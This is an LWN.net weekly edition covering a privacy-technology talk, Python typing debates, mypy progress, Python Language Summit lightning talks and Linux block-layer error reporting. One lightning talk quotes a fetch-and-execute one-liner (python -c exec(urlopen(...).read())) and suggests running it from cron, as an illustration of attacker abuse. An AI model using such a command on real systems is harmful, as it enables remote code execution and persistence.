
This week's edition also includes these inner pages:

Brief items: Brief news items from throughout the community.

Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (6 posted)

There is no viable way to prevent data from being collected about us in the current age of computing. But if institutions insist on knowing our financial status, purchasing habits, health information, political preferences, and so on, they have a responsibility to keep this data—known as personally identifiable information (PII)—from leaking to unauthorized recipients. At the 2017 Strata data conference in London, Steve Touw presented a session on privacy-enhancing technologies. In a fast-paced 40 minutes he covered the EU regulations about privacy, the most popular technical measures used to protect PII, and some pointed opinions about what works and what should be thrown into the dustbin.

To jump straight to Touw's conclusions: we need to maintain much tighter control over data that we share. Like most who have studied the question of PII, Touw finds flaws in current forms of de-identification, which is the technique we rely on most often for protecting PII. He suggests combining de-identification with restrictions on the frequency and types of queries executed against data sets, along with a context-based approach to data protection that is much more sophisticated than current access controls.

No single talk could thoroughly cover all the issues in protecting PII. Touw focused on European legal requirements (which made sense for a conference held in London), technical difficulties in de-identifying data, and good organizational practices for protecting privacy. This article fills out some of the background underlying these issues as well.

Common constraints on data collection

Although people viscerally fear the collection of personal data, and alternatives such as Vendor Relationship Management have been suggested for leaving control over data in the hands of the individual, there are few barriers in the way of organizations that collect this data. The EU has regulated data collection for decades, and its General Data Protection Regulation (GDPR), which is supposed to come into force on May 25, 2018, requires limitations that are familiar to those in the privacy field. These include minimization, data retention limits, and restrictions on use to the original purpose for collecting the data. I'll offer a brief overview of these key concepts.

Minimization means collecting as little data as you can to meet your purpose. If you need to know whether someone is old enough to drive, you can record that as a binary field without recording the person's age. If you need to know how many cars pass down a street each day in order to plan traffic flow, you don't need to record the license plates of the cars.
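The driving-age example can be sketched in code; the field names and the driving age used here are assumptions for illustration, not from the talk. The point is that only the derived boolean is stored, and the birth date is discarded:

```python
from datetime import date

DRIVING_AGE = 17  # varies by jurisdiction; an assumption for this sketch

def can_drive(birth_date: date, today: date) -> bool:
    """Derive the one bit we actually need, then let the birth date go."""
    age = today.year - birth_date.year - (
        (today.month, today.day) < (birth_date.month, birth_date.day)
    )
    return age >= DRIVING_AGE

# Store only the boolean; the birth date never enters the record.
record = {"can_drive": can_drive(date(2000, 6, 1), date(2017, 6, 2))}
```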

Data retention limits are a form of minimization. Most data's value diminishes greatly after a few months. For instance, a person's income may change, so income information collected a year ago may no longer be useful for marketing. Therefore, without much of a sacrifice in accuracy, an organization can protect privacy by discarding data after a certain time interval.

Restricting use to the original purpose of data collection is an even stricter criterion. In principle, it means that a retailer who collects your information in order to charge your credit card should not use that information to improve its marketing campaigns.

Governments in the US impose restrictions only on specific classes of information, such as data collected by health care providers. Fair Information Practices, which cover some broad issues such as transparency and the right to correct errors, are widely praised but not required by law. They also go nowhere near as far as EU laws in granting rights to individuals for their data.

Although the GDPR does not require organizations to obtain consent for data collection, Touw advised them always to do so. Otherwise, the organizations may be asked to demonstrate in court that they had a "legitimate interest" in the data, which is a subjective judgment. Touw did not go into the problems of consent forms, so his advice was really aimed at protecting the company doing the collection, not the individuals.

The dilemma of data sharing

Protection of personal data takes place on two levels: while storing it at the site collecting the data, and while granting access to other parties. Why would sites offer data to other parties? Touw did not cover this question, but there are a few reasons behind that practice.

Organizations can realize a large income stream from selling the data, which can then be used for purposes ranging from benign to ill. Governments collect and share data that is supposed to be for the public benefit (e.g. race and gender, incidences of communicable diseases). Public agencies, and even some companies, believe their data could contribute to initiatives in health, anti-corruption efforts, and other areas. Some institutions also anticipate that they might benefit from tools developed by others. Thus, Netflix released data on who viewed its video content for the Netflix prize of 2009, hoping to get a better algorithm for video recommendations from experts in the field.

When data is shared publicly, the organization tries to strip direct identifiers, such as names and social security numbers, and tries to reduce the risk that indirect identifiers such as postal codes can be used to re-identify individuals. Even when organizations sell their data privately, they often try to de-identify it in similar ways. The GDPR gives organizations pretty much free rein to use and release data, so long as it is correctly de-identified.

Problems with de-identification

The bulk of Touw's talk was devoted to the risks of de-identification, also known as anonymization. His skepticism about de-identification is shared by most experts in computing who have examined the field. In particular, he looked at techniques for pseudonymity and K-anonymity, claiming that they can't prevent re-identification unless they're pursued so far that they render the output data useless.

Touw predicted that organizations will stop releasing free, de-identified data sets, because de-identification has too often proven insufficient and too many embarrassing breaches have been publicized. Besides the Netflix prize mentioned earlier, where researchers re-identified Netflix users from the data [PDF], Touw mentioned some other open data sets and spent a good deal of time on New York City taxi data.

All these re-identification attacks depended on the mosaic effect, or finding other publicly available sources and joining them with the released data set. (Touw called this a "link attack.") In the case of the New York taxi data, most of us would have nothing to fear, but celebrities who are sighted at the beginning or end of their rides could potentially be re-identified. Touw claimed that New York City could not have prevented the re-identification by fuzzing or removing fields from the data, a point also made by the researcher who originally performed the re-identification attack. I believe Touw moved the goalposts a bit by adding new sources of information to fuel possible attacks as he removed existing information. Still, he made a case that the only way to protect celebrities would be to remove everything of value from the data.

Pseudonymization is the easiest way to de-identify data. It consists of putting a meaningless value in place of a personally identifying field. People may still be re-identified, though, if they possess unique values for other fields. For instance, if someone is the only Hispanic person in a particular apartment building, a combination of race and address can identify them. If someone suffers from a rare disease, a hospital listing with diagnoses may reveal sensitive information to someone who knows they have that disease.
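A minimal sketch of pseudonymization (the field names and rows are invented for illustration) might map each direct identifier to a random token, consistently, while leaving the quasi-identifiers—and thus the re-identification risk Touw described—untouched:

```python
import secrets

def pseudonymize(records, key_field):
    """Replace a direct identifier with a random token; the same
    identifier always maps to the same token so records still join."""
    tokens = {}
    out = []
    for rec in records:
        rec = dict(rec)  # leave the caller's data unmodified
        real = rec[key_field]
        if real not in tokens:
            tokens[real] = secrets.token_hex(8)
        rec[key_field] = tokens[real]
        out.append(rec)
    return out

rows = [{"name": "Alice", "zip": "20001"},
        {"name": "Alice", "zip": "20002"},
        {"name": "Bob",   "zip": "20001"}]
pseudo = pseudonymize(rows, "name")
# The name is gone, but the ZIP codes (quasi-identifiers) remain,
# so a link attack against another data set is still possible.
```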

K-anonymity addresses the problem of unique values, known also as high cardinality values. The technique makes sure there are enough duplicate values in different rows of data so that no individual is identified by a particular combination of fields. K-anonymity works by making values in fields more general: a common example is offering just the first three digits of a five-digit ZIP code. Because the digits are hierarchical (the code 200 is a single contiguous geographic area that contains 20001, 20002, etc.), generalizing the ZIP code exposes data that is still useful but is less specific.
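A rough sketch of the idea (the rows and field names are invented for illustration) generalizes ZIP codes to their first three digits and then checks that every combination of quasi-identifier values occurs at least k times:

```python
from collections import Counter

def generalize_zip(zip_code: str, digits: int = 3) -> str:
    """Keep only the leading digits of a ZIP code."""
    return zip_code[:digits] + "*" * (len(zip_code) - digits)

def is_k_anonymous(rows, quasi_identifiers, k):
    """Every quasi-identifier combination must appear at least k times."""
    counts = Counter(tuple(r[q] for q in quasi_identifiers) for r in rows)
    return all(c >= k for c in counts.values())

rows = [{"zip": "20001", "age": "30-39"},
        {"zip": "20002", "age": "30-39"},
        {"zip": "20001", "age": "30-39"}]

# Not 2-anonymous on full ZIP codes (one row is unique)...
before = is_k_anonymous(rows, ["zip", "age"], 2)
# ...but 2-anonymous once the ZIPs are generalized to three digits.
for r in rows:
    r["zip"] = generalize_zip(r["zip"])
after = is_k_anonymous(rows, ["zip", "age"], 2)
```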

Touw briefly mentioned two enhancements to K-anonymity, known as L-diversity and T-closeness, that are more restrictive. L-diversity [PDF] restricts the number of unique values in information by taking into account the probability that an attacker can guess something about the target (such as their address). T-closeness [PDF] tries to prevent re-identification by making sure that each division in the data (such as ZIP code) contains sensitive values with about the same frequency as the general population. Touw claimed L-diversity and T-closeness are more trouble than they're worth, and that all these techniques leave people at risk of re-identification unless the data is generalized to the point where it's worthless.

When you listen to data scientists like Touw who have investigated the limitations of anonymization, you come away feeling that there's no point to doing it. But let's step back and consider whether this is a constructive conclusion. Nearly all published examples of re-identification took advantage of poor de-identification techniques. Done right, according to proponents, de-identification is still safe. On the other hand, it's easy for proponents of de-identification to say that a technique was flawed after the fact.

To resolve the dilemma, one can look at de-identification like encryption. We can be fairly certain that, within a few decades, increased computing power and new algorithms will allow attackers to break our encryption. We keep increasing key sizes over the decades to compensate for this certainty. And yet we keep using encryption, because nothing better exists. De-identification is still worth using too. But Touw has some alternative ways to carry it out.

Proposed remedies

In addition to advising that organizations obtain consent for data collection, Touw offered two practices that are more effective than the previous methods of data protection: restricting data requests to a safe set of queries and using context-based restrictions. Neither practice is in common use now, but models exist for their use.

If an organization does not release data in the open, it can achieve some of the organizational and social benefits of open data by offering a limited set of queries to third parties. Touw promoted the concept of differential privacy, which is a complex technology understood by relatively few data experts. The concept has been attributed [PDF] to Cynthia Dwork, who co-authored a key paper [PDF] laying out the theory. She explains differential privacy there (on page 6) by saying, "it ensures that any sequence of outputs (responses to queries) is 'essentially' equally likely to occur, independent of the presence or absence of any individual." It never reveals any specific fields in the underlying data, but provides a set of aggregate queries—such as sums or averages—that mathematical analysis of the data set has shown to be privacy-preserving.
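A toy version of the mechanism, assuming a simple counting query (the function names and data here are illustrative, not from Dwork's paper): a count has sensitivity 1—adding or removing one person changes it by at most 1—so adding Laplace noise with scale 1/ε gives ε-differential privacy for that query:

```python
import math
import random

def laplace_noise(scale: float) -> float:
    """Draw one Laplace(0, scale) sample via inverse-transform sampling."""
    u = random.random() - 0.5
    u = max(min(u, 0.499999), -0.499999)  # keep log() away from zero
    return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))

def private_count(rows, predicate, epsilon: float) -> float:
    """A counting query has sensitivity 1, so Laplace(1/epsilon) noise
    yields epsilon-differential privacy for this single query."""
    true_count = sum(1 for r in rows if predicate(r))
    return true_count + laplace_noise(1.0 / epsilon)

ages = [{"age": a} for a in (25, 34, 41, 58, 67)]
noisy = private_count(ages, lambda r: r["age"] >= 40, epsilon=0.5)
```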

Touw demonstrated how a specific value for a specific person might be obtained by asking the same question—or to disguise the attack, many questions that differ slightly—over and over. Each question produces a slightly different result in the field you're interested in, but if you take the average of these results you can get very close to the original value. So some form of rate-limiting must be imposed on queries.
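The averaging attack Touw demonstrated is easy to simulate; this sketch uses Gaussian noise and invented numbers purely for illustration. One noisy answer reveals little, but averaging many repeated answers drives the noise toward zero—which is why rate limiting (or a global privacy budget) is needed:

```python
import random
import statistics

def noisy_query(true_value: float, scale: float = 2.0) -> float:
    """A toy 'privacy-preserving' query that adds fresh noise each call."""
    return true_value + random.gauss(0.0, scale)

secret_salary = 52_000.0

# Repeat the same question many times and average the answers:
answers = [noisy_query(secret_salary) for _ in range(10_000)]
estimate = statistics.fmean(answers)
# The estimate lands very close to the secret value.
```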

Touw's other major recommendation involves context-based or purpose-based restrictions, which he called "the future of privacy controls". They go far beyond individual or group access controls used by most sites.

One example of context-based restrictions is time-based access. A conventional employer might allow access by its employees from 9:00 AM to 5:00 PM. In a more flexible environment, such as a hospital where nurses' shifts have irregular beginnings and ends, the hospital may allow each nurse access to data when their schedule indicates they are on duty.
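A schedule-driven access check of that kind might be sketched as follows; the schedule structure and user names are hypothetical, not something Touw presented:

```python
from datetime import datetime, time

# Hypothetical on-duty schedule: user -> list of (start, end) shifts.
SHIFTS = {
    "nurse_a": [(time(7, 0), time(15, 30))],
    "nurse_b": [(time(22, 0), time(23, 59, 59)), (time(0, 0), time(6, 30))],
}

def may_access(user: str, now: datetime) -> bool:
    """Grant access only while the schedule says the user is on duty."""
    t = now.time()
    return any(start <= t <= end for start, end in SHIFTS.get(user, []))
```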

Another type of context-based restriction is based on granting users limited access to data based on a license that spells out what they want to do (say, cancer research) and how they can use data. If the user starts issuing requests for certain combinations of rows or columns that don't seem to fulfill the basis for which the license was granted, access can be denied.

Touw advises organizations not to try to combine all their data in a single data lake—or worse still, to copy data into a new repository in order to perform access controls. Maintaining two copies of data is always cumbersome and error-prone. In addition, you now offer attackers twice the opportunities to break into the data. Instead, he suggests an organization set up what he calls a "data control plane". It implements all the policies defined by the organization and covers all data stores. The control plane should expose easy ways to create rules, make sure new policies take effect immediately, recognize the types of context mentioned earlier, and maintain audits that show what the data was used for. Organizations must also exercise governance over data so they know who owns it, who has access to it and under what circumstances, and how to manage the data's lifecycle (acquiring, storing, selling, purging). They can't just rely on the IT department to define and implement policies.

Few if any commercial vendors offer the advanced privacy-protecting technologies recommended by Touw. So at this point, attackers run ahead of most organizations that maintain data on us. Still, Touw's talk opens up a valuable debate about what real privacy protection looks like in 2017.

Comments (45 posted)

Mark Shannon is concerned that the Python core developers may be replaying a mistake: treating two distinct things as being the same. Treating byte strings and Unicode text-strings interchangeably is part of what led to Python 3, so he would rather not see that happen again with types and classes. The Python typing module, which is meant to support type hints, currently implements types as classes. That leads to several kinds of problems, as Shannon described in his session at the 2017 Python Language Summit.

He wanted to convince people that the typing module is "heading in the wrong direction". He is not opposed to type hints or variable annotations, but is concerned that the typing module is conflating types and classes in a way that is detrimental. Classes are for object-oriented programming, while types declare what something is. A class can be a subclass of another without being a subtype of it. List[int] and List[float] (lists of integers and floating point numbers, respectively) are distinct types, he said, but are both implemented by the list class. In the current typing module, types are implemented as classes.
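Shannon's distinction is visible at runtime, where the type parameter is simply erased; this small sketch is my illustration, not code from his talk:

```python
from typing import List

ints: List[int] = [1, 2, 3]
floats: List[float] = [1.0, 2.0]

# List[int] and List[float] are distinct *types* to a checker like
# mypy, but at runtime both are implemented by the same *class*:
assert type(ints) is type(floats) is list

# The parameter cannot be checked at runtime at all:
try:
    isinstance(ints, List[int])
except TypeError:
    pass  # subscripted generics reject isinstance()
```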

This has happened before, with bytes and Unicode in the Python 2 days, Shannon said. He would rather see this get addressed now, before the core developers (and the language) get to that point again.

Practical problems

Using classes for types has some concrete negative effects. Classes are "large and bad" in CPython, but are much worse for MicroPython. A namedtuple-based implementation of List[int] is around 1/60 the size of the class-based one.

There are also some oddities. He showed two class definitions:

class MyList(Sequence[int], list): pass
class MyList(list, Sequence[int]): pass

In both cases, MyList inherits from builtins.list and the sequence-of-integers type (Sequence[int]), but a simple append operation on an instance of one of them is 10% faster than on an instance of the other.

It turns out that the method resolution order (MRO) comes into play. MRO determines which method actually gets called when multiple inheritance is used; Python tracks that on the __mro__ attribute. For a class that inherits from builtins.list, the MRO has three items, but for List[int] it has 17.
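The general effect of the MRO is easy to demonstrate without typing at all; this sketch (mine, not Shannon's) shows that swapping the base classes changes both the __mro__ and which method wins:

```python
class Base:
    def who(self):
        return "Base"

class Left(Base):
    def who(self):
        return "Left"

class Right(Base):
    def who(self):
        return "Right"

# Swapping the order of the bases changes the MRO, and therefore
# which who() implementation is found first.
class A(Left, Right): pass
class B(Right, Left): pass
```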

Types and type constructors are already hard enough to understand, he said. Turning them into classes and metaclasses just makes that worse. In addition, since types in typing already have a custom metaclass, it makes it difficult to define a type for a class that has its own custom metaclass.

When adopting type hints, the core developers made a few promises, Shannon said. Type hints would allow programs to be checked for type errors, they would always be optional, and using them should not slow your program down. The first two of those have been kept, but the last has not. Every time you run a program with type hints, it pulls in a large chunk of code that slows things down.

Options

He presented three options. The first was to continue using types as classes, but to laboriously check that an instance of Iterable[int] actually produces integers for each entry, then hope that things don't get as bad as they did for bytes and Unicode. Another was "the status quo"; much the same as the first, but ignoring the checks that seem expensive. The option that he prefers is to keep types and classes distinct, which will remove the "conceptual muddle" and reduce the run-time overhead of using types. He has a minimal prototype implementation on GitHub to demonstrate what he means.

Attendees were generally supportive of his ideas; Guido van Rossum filed a bug for typing on some of the issues he raised. There were also suggestions on ways to reduce the overhead for code that uses type hints. Łukasz Langa noted that Instagram had reduced the size of compiled Python (i.e. bytecode) by 1.5% just by removing the docstrings; perhaps something similar could be done to remove the type annotations to reduce the size of the code.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

In his 2017 Python Language Summit session, Jukka Lehtosalo updated attendees on the status of type checking for the language, in general, and for the mypy static type checker. There are new features in the typing module and in mypy, as well as work in progress and planned features for both. For a feature, type hints, that is really only around three years old, there has been a lot of progress made—but, of course, there is still more to come.

The most significant new thing for types in Python is the adoption of PEP 526, which adds a way to annotate variables with their types. As of Python 3.6, variable annotations can be used for regular variables, instance variables, and class variables. The latter is made possible with the ClassVar[] annotation that has been added to typing. Other additions include NewType() for creating distinct types and NoReturn for functions that do not return.
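A short sketch of these additions; the class and names are invented for illustration:

```python
from typing import ClassVar, NewType

# NewType makes a distinct type for a checker; at runtime it is an int.
UserId = NewType("UserId", int)

class Config:
    retries: ClassVar[int] = 3   # a class variable, per PEP 526
    timeout: float               # a bare instance-variable annotation

    def __init__(self, timeout: float) -> None:
        self.timeout = timeout

uid: UserId = UserId(42)
assert uid == 42  # NewType adds no runtime wrapper
```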

Some recent mypy features include function overloads in source files (and not just stub files) and basic metaclass support, but there is still work to be done on the latter. There is also a new "quick mode" that is up to ten times faster. Quick mode is an incremental check; it just looks at the file itself and assumes that what it imports does not need to be checked.

There are also some experimental mypy features that Lehtosalo mentioned. The mypy_extensions module contains various extensions to typing that are being tried out. Some of those may get promoted to typing if they work out. One of those is the more flexible Callable[] type, which has a syntax that is "not pretty" but works. More information about these and other features can be found in his mypy 0.510 release announcement.

There are also some features in progress for mypy, he said. The TypedDict type, which will allow dictionaries that specify the types of values for specific keys, is one. Another is support for structural subtyping using Protocols. There are some planned improvements for type variables, including adding support for variadic type variables and for variables that describe function argument specifications. Decorators sometimes change a function's signature, so support for declaring the decorated type of a function is planned as well.
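TypedDict later graduated from mypy_extensions into the standard typing module; a sketch in the standardized form (the Movie example is illustrative):

```python
from typing import TypedDict  # lived in mypy_extensions at the time

class Movie(TypedDict):
    title: str
    year: int

# To a type checker, m["year"] is an int and m["title"] is a str;
# at runtime a TypedDict instance is a plain dict.
m: Movie = {"title": "Metropolis", "year": 1927}
```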

Mypy is starting to be used in production. At Dropbox, where Lehtosalo works, 700,000 lines of code have been annotated and are being checked with mypy. The Zulip project has 95,000 lines of code annotated; Facebook, Quora, and others are using the tool as well. There has been quite a bit of positive user feedback, he said. Performance is still an issue, however; a full run at Dropbox takes around two minutes, which is "barely acceptable". But a large scale roll-out at Dropbox is under way.

There were some lessons learned along the way. To start with, changing type systems is "very expensive" and causes a fair amount of pain for users. That means Dropbox may become stuck with some early choices it made before some features had been added to typing and mypy. Having the typing module in the standard library has turned out to be annoying, because there are new features in the 3.6 release that can't be used in 3.5, which is the version used by Dropbox. typing is moving fast, so sometimes it makes sense to backport features into earlier versions, he said.

There are a lot of contributors to the projects (both typing and mypy), especially for typeshed, which collects annotations for Python built-ins and the standard library. The two other major type checkers, pytype and PyCharm, also contribute, so there is a real community building up around type annotations.

Mark Shannon asked when the project would decide to stop adding features for ever-more-obscure type constructs; "at what point do you say 'just use Any'?" Lehtosalo said that the project tends to consider constructs that have multiple users and uses throughout the ecosystem and is not interested in adding support for lots of one-off corner cases.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library; it even has asyncio support, for example. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said, it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not need to be random, necessarily, though that would be fine, it just needs to change the order enough so that reliance on ordering would be picked up in testing.

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict, an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.
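The behavior under discussion is easy to observe (this sketch assumes CPython 3.6 or later; insertion ordering only became a language guarantee in 3.7):

```python
from collections import OrderedDict

d = {}
for key in ("charlie", "alpha", "bravo"):
    d[key] = True

# CPython 3.6 preserves insertion order as an implementation detail;
# Smith's worry was that code would silently come to depend on it.
assert list(d) == ["charlie", "alpha", "bravo"]

# Code that must be portable across implementations should still
# state the requirement explicitly:
od = OrderedDict(d)
```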

Python as a security vulnerability

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

python -c "exec(urlopen(...).read())"

Adding it as a cron job would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf (documentation here). It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (13 posted)

The kernel's filesystem and block layers are places where a lot of things can go wrong, often with unpleasant consequences. To make things worse, when things do go wrong, informing user space about the problem can be difficult as a consequence of how block I/O works. That can result in user-space applications being unaware of trouble at the I/O level, leading to lost data and enraged users. There are now two separate (and complementary) proposals under discussion that aim to improve how error reporting is handled in the block layer.

Block-layer error codes

One problem with existing reporting mechanisms is that they are based on standard Unix error codes, but those codes were never designed to handle the wide variety of things that can go wrong with block I/O. As a result, almost any type of error ends up being reported back to the higher levels of the block layer (and user space) as EIO (I/O error) with no further detail available. That makes it hard to determine, at both the filesystem and user-space levels, what the correct response to the error should be.

Christoph Hellwig is working to change that situation by adding a dedicated set of error codes to be used within the block layer. This patch set adds a new blk_status_t type to describe block-level errors. The specific error codes added thus far correspond mostly to the existing Unix codes. So BLK_STS_TIMEOUT, indicating an operation timeout, maps to ETIMEDOUT, while BLK_STS_NEXUS, describing a problem connecting to a remote storage device, becomes EBADE ("invalid exchange"). There is, according to Hellwig, "some low hanging fruit" that can be improved by additional error codes, but those codes are not added as part of this patch set.
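To illustrate how such a translation layer works, here is a user-space sketch of a status-to-errno helper. The enum values are loosely modeled on the patch set, but the exact names, the fallback behavior, and the helper's shape here are assumptions for illustration, not the kernel's actual code:

```c
#include <errno.h>

/* Hypothetical block-status codes, loosely modeled on the patch set. */
typedef enum {
    BLK_STS_OK = 0,
    BLK_STS_TIMEOUT,    /* operation timed out */
    BLK_STS_NEXUS,      /* could not reach a remote storage device */
    BLK_STS_IOERR,      /* catch-all, as before */
} blk_status_t;

#ifndef EBADE           /* EBADE is Linux-specific; define it if absent */
#define EBADE 52
#endif

/* Translate a block-layer status into a negative errno for upper layers. */
static int blk_status_to_errno(blk_status_t status)
{
    switch (status) {
    case BLK_STS_OK:      return 0;
    case BLK_STS_TIMEOUT: return -ETIMEDOUT;
    case BLK_STS_NEXUS:   return -EBADE;
    default:              return -EIO;  /* anything unknown stays EIO */
    }
}
```

The benefit of keeping the richer status type inside the block layer is that the loss of information happens only once, at a single translation point, rather than in every driver.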

The new errors can be generated at the lowest levels of the kernel's block drivers, and will be propagated to the point that filesystem code sees them in the results of its block I/O requests. To get there, the bi_error field in struct bio, which contained a Unix error code, has been renamed to bi_status. In-tree filesystems have been changed to use the new field, but they do not yet act on the additional information that may be available there.

This is, in other words, relatively early infrastructural work that makes it possible for the block layer to produce better error information. Actually making use of that infrastructure will have to wait until this work is accepted and headed toward the mainline.

Reporting writeback errors

One particular challenge for block I/O error reporting is that many I/O requests are not the direct result of a user-space operation. Most file data is buffered through the kernel's page cache, and there can be a significant delay between when an application writes data into the cache and when a writeback operation flushes that data to persistent storage. If something goes wrong during writeback, it can be hard to report that error back to user space since the operation that caused that writeback in the first place will have long since completed. The kernel makes an attempt to save the error and report it on a subsequent system call, but it is easy for that information to be lost with the result that the application is unaware that it has lost data.

Jeff Layton's writeback-error reporting patches are an attempt to improve this situation. He adds a mechanism that is based on the idea that applications that care about their data will occasionally call fsync() to ensure that said data has made it to persistent storage. Current kernels might report a writeback error on an fsync() call, but there are a number of ways in which that can fail to happen. With the new mechanism in place, any application that holds an open file descriptor will reliably get an error return on the first fsync() call that is made after a writeback error occurs.

